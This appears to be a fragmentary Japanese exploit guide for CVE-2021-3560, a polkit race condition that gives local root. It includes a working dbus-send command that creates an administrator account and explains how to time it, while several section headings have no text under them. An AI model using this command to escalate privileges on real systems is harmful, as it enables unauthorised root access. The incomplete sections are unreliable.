
polkitにおけるrace conditionを利用した権限昇格
polkit のレースコンディションを介した権限昇格。
CVE-2021-3560 は polkit のレースコンディションであり、認証されていないローカルユーザーが root 権限を取得できるようにします。この脆弱性は、接続が切断されたときに polkit が D-Bus エラーを処理する方法に存在します。
最適なタイミングを決定するには、次のコマンドを実行します。
time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:testuser string:"Test User" int32:1
コードでは real 時間の半分 ± 0.003 の範囲を使用します。
なぜタイミングが重要なのか?
エクスプロイトの仕組み:
成功統計
エクスプロイトが機能しない場合は、以下を試してください。